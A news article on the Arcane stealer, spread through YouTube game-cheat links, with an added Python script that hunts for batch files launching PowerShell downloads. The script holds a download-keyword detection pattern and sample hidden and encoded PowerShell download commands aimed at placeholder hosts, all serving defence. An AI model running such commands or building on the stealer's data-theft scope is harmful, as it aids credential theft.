YouTube Game Cheats Target Russian-Speaking Users with Arcane Stealer Malware

YouTube videos promoting game cheats are being exploited to spread a new malware known as Arcane, primarily targeting Russian-speaking users. This malware is capable of collecting an extensive array of sensitive information from infected devices.

According to Kaspersky, Arcane can gather account details from various VPNs and gaming clients, as well as other network utilities. The attack typically involves sharing a link to a password-protected archive in YouTube videos. Once the link is accessed, it triggers a batch file that uses PowerShell to download additional malicious files.
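
The chain described above, a batch file that launches PowerShell to download further files, leaves a parent/child pattern in process-creation logs that defenders can hunt for. The following is an added example, not code from Kaspersky or from the original article; the event field names, the sample events and the list of download keywords are assumptions constructed for illustration.

```python
import base64
import re

DOWNLOAD = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|start-bitstransfer|"
                      r"downloadfile|downloadstring|net\.webclient|curl|wget)\b", re.I)
BATCH = re.compile(r"\.(bat|cmd)\b", re.I)
# Common spellings of PowerShell's -EncodedCommand switch (base64 of UTF-16LE text).
ENCODED = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def effective_command(cmdline):
    """Return the command line with any -EncodedCommand payload decoded and appended."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16LE: fall back to the raw text

def find_batch_download_chains(events):
    """Return (parent_pid, child_pid) pairs: batch script under cmd.exe -> PowerShell download."""
    by_pid = {e["pid"]: e for e in events}  # assumes PIDs are unique within the window
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None or not e["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        if not (parent["image"].lower().endswith("cmd.exe") and BATCH.search(parent["cmdline"])):
            continue
        if DOWNLOAD.search(effective_command(e["cmdline"])):
            hits.append((parent["pid"], e["pid"]))
    return hits

# Constructed sample events (field names are assumptions, modelled on process-creation logs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
B64 = base64.b64encode("(New-Object Net.WebClient).DownloadFile('https://files.example/b.zip','b.zip')"
                       .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"pid": 200, "ppid": 100, "image": CMD, "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\cheat\install.bat"'},
    {"pid": 300, "ppid": 200, "image": PS, "cmdline": "powershell -w hidden iwr https://files.example/a.zip -OutFile a.zip"},
    {"pid": 320, "ppid": 200, "image": PS, "cmdline": "powershell -ExecutionPolicy Bypass Get-Date"},
    {"pid": 210, "ppid": 100, "image": CMD, "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\x\run.cmd"},
    {"pid": 310, "ppid": 210, "image": PS, "cmdline": "powershell -NoP -enc " + B64},
    {"pid": 400, "ppid": 100, "image": PS, "cmdline": "powershell iwr https://intranet.example/tool.zip"},
]

if __name__ == "__main__":
    print(find_batch_download_chains(SAMPLE_EVENTS))
```

Only the two PowerShell processes spawned from a batch script and carrying a download command are reported; the encoded variant is caught because the payload is decoded before matching.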

The malware package includes two key components: one functions as a cryptocurrency miner, while the second is a variant of the Phemedrone Stealer, named VGS. Over time, VGS has been replaced by Arcane in these attacks.

Arcane not only steals login credentials, passwords, credit card data, and cookies from various web browsers but is also capable of collecting system data and configuration files from several apps, including:

  • VPN Clients: OpenVPN, NordVPN, and others.
  • Network Utilities: ngrok, Cyberduck, FileZilla, etc.
  • Messaging Apps: ICQ, Skype, Discord, Telegram, and more.
  • Email Clients: Microsoft Outlook.
  • Gaming Services: Steam, Ubisoft Connect, and others.
  • Crypto Wallets: multiple wallets, including Ethereum and Jaxx.

Additionally, Arcane can take screenshots, enumerate running processes, and retrieve saved Wi-Fi network passwords. To extract sensitive browser data, it utilizes the Data Protection API and even deploys a utility called Xaitax to crack browser keys.

The threat actors involved have launched a related loader known as ArcanaLoader, which masquerades as a tool for downloading game cheats but actually installs the Arcane malware. The main targets of this campaign are users in Russia, Belarus, and Kazakhstan.

Kaspersky emphasized the adaptability of cybercriminals, noting their continuous enhancement of tools and methods for distributing malware. The multifaceted data collection capabilities of Arcane highlight the advanced techniques being employed to compromise user information.

